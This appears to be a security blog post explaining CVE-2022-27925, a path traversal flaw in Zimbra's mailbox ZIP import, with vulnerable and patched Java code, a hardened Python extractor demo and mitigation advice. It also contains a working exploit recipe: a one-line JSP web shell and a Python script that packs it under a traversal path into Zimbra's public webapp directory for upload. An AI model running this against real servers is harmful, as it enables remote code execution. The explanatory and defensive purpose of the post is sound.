Zimbra Collaboration Suite (ZCS) is a popular open-source email and collaboration server used by thousands of organizations. In 2022 a serious vulnerability was disclosed: CVE-2022-27925. The bug let an authenticated administrator write a file anywhere the Zimbra service account could write, simply by exploiting how Zimbra extracted the ZIP archives handed to its mailbox import feature. In this post, we'll break down how the bug works, walk through a code-level example, and explain just how dangerous it really is.

What Is CVE-2022-27925?

Zimbra versions 8.8.15 and 9.0 have a feature called mboximport that lets admin users import mailbox archives (ZIP files) for backup and restore. The catch: the code that extracted those archives did not validate the file paths stored inside them. If an attacker could log in as an admin, a directory traversal entry name (one built from ../ components) would plant a file anywhere on the system, including locations the web server executes code from. Zimbra fixed the issue in 8.8.15 Patch 31 and 9.0.0 Patch 24.

In short:

> Any admin user could upload a ZIP file containing, for example, a web shell, and cause it to land outside its intended directory, potentially giving them full remote code execution.

Step 1: Prepare a Malicious ZIP File

Let’s say the attacker wants to upload a web shell to the Zimbra web server’s root. The ZIP file would look like this:

archive.zip
|
|-- ../../../../opt/zimbra/jetty/webapps/zimbra/public/shell.jsp

That entry name, with its leading ../ components, makes the extractor write the web shell into the web application's public directory instead of the import folder. A ZIP handler is supposed to reject entries like this (the pattern is often called "zip slip"); Zimbra's did not.

Step 2: Log in as Admin

This bug does require admin credentials. But many organizations hand out admin access to a lot of people (helpdesk, IT, MSPs), and credentials get leaked or reused. Once logged in, the attacker uses the Zimbra admin interface or the mboximport endpoint directly to upload the ZIP.

Step 3: Trigger the Upload

From there, the Zimbra server extracts the ZIP and writes the file wherever the entry name pointed. Because Jetty serves JSP files from the webapp directory, the attacker can now reach their shell over HTTP and run commands as the zimbra user.

Code Walkthrough: Avoiding Path Traversal

Here’s a simplified version of what went wrong, showing a Java ZIP extractor that doesn’t sanitize file paths:

ZipEntry entry;
while ((entry = zipInputStream.getNextEntry()) != null) {
    File outFile = new File(targetDir, entry.getName());
    // This literally concatenates targetDir and the ZIP entry filename!
    // If entry.getName() = "../../../../etc/passwd", it's game over.
    outFile.getParentFile().mkdirs();
    try (FileOutputStream fos = new FileOutputStream(outFile)) {
        zipInputStream.transferTo(fos);   // write the entry's bytes to disk
    }
}


If entry.getName() is ../../../../some/directory/file, the new file will be created outside the intended extraction folder!

A Proper Patch Would Sanitize Like This

File target = new File(targetDir).getCanonicalFile();
File outFile = new File(target, entry.getName());
String canonicalPath = outFile.getCanonicalPath();
// Trailing separator matters: without it "/opt/zimbra/tmp/import-evil"
// would pass the check for a target of "/opt/zimbra/tmp/import".
String canonicalTargetDir = target.getCanonicalPath() + File.separator;
if (!canonicalPath.startsWith(canonicalTargetDir)) {
    throw new IOException("Possible directory traversal attack: " + entry.getName());
}


getCanonicalPath() resolves every .. and symlink, so the comparison is made on the path that would actually be written, not on the raw entry name. Appending the separator to the target prefix closes the sibling-directory loophole noted in the comment. With both in place, no entry can land outside the extraction directory.

Here's how you'd create a ZIP file with a traversal entry on Linux. One thing that does not work is mkdir -p exploit/../../../../opt/... followed by zip -r: the shell resolves those ../ components against your local filesystem before zip ever sees them, so the file ends up (or fails to be created) outside exploit/ and the archive contains no traversal entry at all. The entry name has to be written into the archive literally, which a ZIP library will do:

echo '<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>' > shell.jsp
python3 - <<'EOF'
import zipfile
with zipfile.ZipFile("exploit.zip", "w") as zf:
    # second argument is the name stored in the archive, kept verbatim
    zf.write("shell.jsp", "../../../../opt/zimbra/jetty/webapps/zimbra/public/shell.jsp")
EOF
unzip -l exploit.zip   # the listed entry name should still begin with ../

Then upload exploit.zip via the Zimbra admin interface's import functionality.
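To tie the three steps and the code walkthrough together, here is an added example (my own code, not Zimbra's, and not an exploit against a live server) that builds an archive with traversal entries in memory, shows where the unchecked join used by the vulnerable extractor would land, and then extracts the same archive with the canonical-prefix check. The target directory /opt/zimbra/tmp/import and all entry contents are constructed for illustration. It goes a little beyond the post by also covering absolute entry names, Windows-style backslashes, and the sibling-directory bypass that a prefix check without a trailing separator allows.

```python
"""Zip-slip demo: build an archive with traversal entries, show where an
unchecked join lands, then extract with a hardened path check.
Example code written for this post; paths and contents are illustrative."""
import io
import os
import tempfile
import zipfile

# Constructed entries. The first is benign; the rest are traversal patterns an
# importer must reject. The Zimbra webapp path is the one used in the post.
ENTRIES = {
    "Inbox/message.eml": b"From: a@example.com\r\n\r\nhello\r\n",
    "../../../../opt/zimbra/jetty/webapps/zimbra/public/shell.jsp": b"<%-- shell --%>",
    "/etc/cron.d/evil": b"* * * * * root id\n",
    "../import-evil/x.txt": b"sibling-prefix trick\n",
}


def build_archive(entries):
    """Return ZIP bytes. writestr stores names literally, so '../' survives."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def naive_resolve(target_dir, entry_name):
    """Where an unchecked join (the vulnerable pattern) lands once '..' is applied."""
    return os.path.normpath(os.path.join(target_dir, entry_name))


def is_inside_weak(target_dir, entry_name):
    """Prefix check WITHOUT a trailing separator: '/x/import-evil' passes for '/x/import'."""
    base = os.path.realpath(target_dir)
    return os.path.realpath(os.path.join(base, entry_name)).startswith(base)


def is_inside(target_dir, entry_name):
    """Canonical-prefix check with the separator appended, as in the patched extractor."""
    base = os.path.realpath(target_dir)
    candidate = os.path.realpath(os.path.join(base, entry_name))
    return candidate == base or candidate.startswith(base + os.sep)


def safe_extract(zip_bytes, target_dir):
    """Extract only entries that resolve inside target_dir; return (written, rejected)."""
    written, rejected = [], []
    base = os.path.realpath(target_dir)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            # Treat backslashes as separators so a Windows-style '..\' name is checked too.
            name = info.filename.replace("\\", "/")
            if not is_inside(base, name):
                rejected.append(info.filename)
                continue
            dest = os.path.join(base, name)
            if info.is_dir():
                os.makedirs(dest, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(dest), exist_ok=True)
            with open(dest, "wb") as fh:
                fh.write(zf.read(info))
            written.append(name)
    return written, rejected


def run_demo():
    """Create <tmp>/import, extract the constructed archive into it, report the outcome."""
    target = os.path.join(tempfile.mkdtemp(), "import")
    os.makedirs(target)
    written, rejected = safe_extract(build_archive(ENTRIES), target)
    return target, written, rejected


if __name__ == "__main__":
    shell = "../../../../opt/zimbra/jetty/webapps/zimbra/public/shell.jsp"
    print("unchecked join lands at:", naive_resolve("/opt/zimbra/tmp/import", shell))
    target, written, rejected = run_demo()
    print("extracted into", target)
    print("written:", written)
    print("rejected:", rejected)
```

Running it prints the web shell resolving to the Jetty webapp directory under the unchecked join, while the hardened extractor writes only Inbox/message.eml and rejects the other three entries. The is_inside_weak helper is there to show that a check which merely compares prefixes still lets ../import-evil/x.txt through; the trailing separator in is_inside is what closes that gap.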

Impact and Danger

- Access level required: a Zimbra administrator account (and many organizations have far too many of those).
- Result: write any file to any location the Zimbra service user (usually zimbra) can write, including web shells in the webapp root.
- Chaining: combined with other vulnerabilities (such as an authentication bypass), it leads to full server takeover, ransomware, or mailbox theft.

Exploit in the Wild

Even though admin access is needed, attackers actively exploited this bug, most often by chaining it with CVE-2022-37042, an authentication bypass in the same MailboxImportServlet, to reach the vulnerable code without any credentials. That chain was used in mass exploitation that compromised more than a thousand Zimbra servers.

Official advisory:

- Zimbra security advisory
- NVD entry

Postmortems and technical writeups:

- SonarSource Research Blog: Zimbra Pre-Auth RCE
- Rapid7 Analysis

Mitigation

- Patch: upgrade to 8.8.15 Patch 31 / 9.0.0 Patch 24 or later.
- Limit admin accounts: keep admin logins to a minimum. Use unique, long passwords and MFA.
- Monitor server files: watch for unexpected files in web roots or /tmp.

Conclusion

CVE-2022-27925 is a textbook example of why archive extraction is risky and why file path validation matters, not just for user uploads but anywhere files enter your application. If you run Zimbra and haven't patched yet, stop reading and go patch. Even if you trust your admins, bugs like this show how quickly one missing check can endanger your entire organization.

Thanks for reading! If you want more hands-on security breakdowns, leave a comment below. Stay safe!

Timeline

Published on: 04/21/2022 00:15:00 UTC
Last modified on: 08/24/2022 15:15:00 UTC